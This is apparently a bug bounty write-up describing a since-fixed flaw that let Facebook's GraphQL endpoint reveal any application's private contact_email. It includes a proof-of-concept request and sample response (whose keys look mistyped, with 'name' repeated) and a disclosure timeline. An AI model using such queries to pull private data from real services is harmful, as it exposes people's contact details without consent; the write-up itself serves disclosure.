Posted on January 27, 2020

Disclose contact_email of any Facebook application

In Facebook developer application dashboard there is field “contact_email” which means to be secret and use to communication between app admin/developer and Facebook.

However, accessing this field using Graph API was secured but changing query field to GraphQL call, I was able to access the Email ID of any Facebook Application.

Proof of concept

Request:
POST /graphql
Host: graph.facebook.com

q=nodes(35xxxxx28){name,contact_email}
Response:
{
  "35xxxxx28": {
    "name": "Facebook Application Name"
    "name": "contact@company.com"
  }
}

Impact

This could have let a malicious user to access the contact_email of any application using GraphQL.

Timeline

  • 21 Nov, 2018 – Report Sent.
  • 28 Nov, 2018 – Triaged.
  • 29 Jan, 2019 – Fixed.
  • 12 Feb, 2019 – Bounty Awarded.

Categories: Security, Writeup

Tags: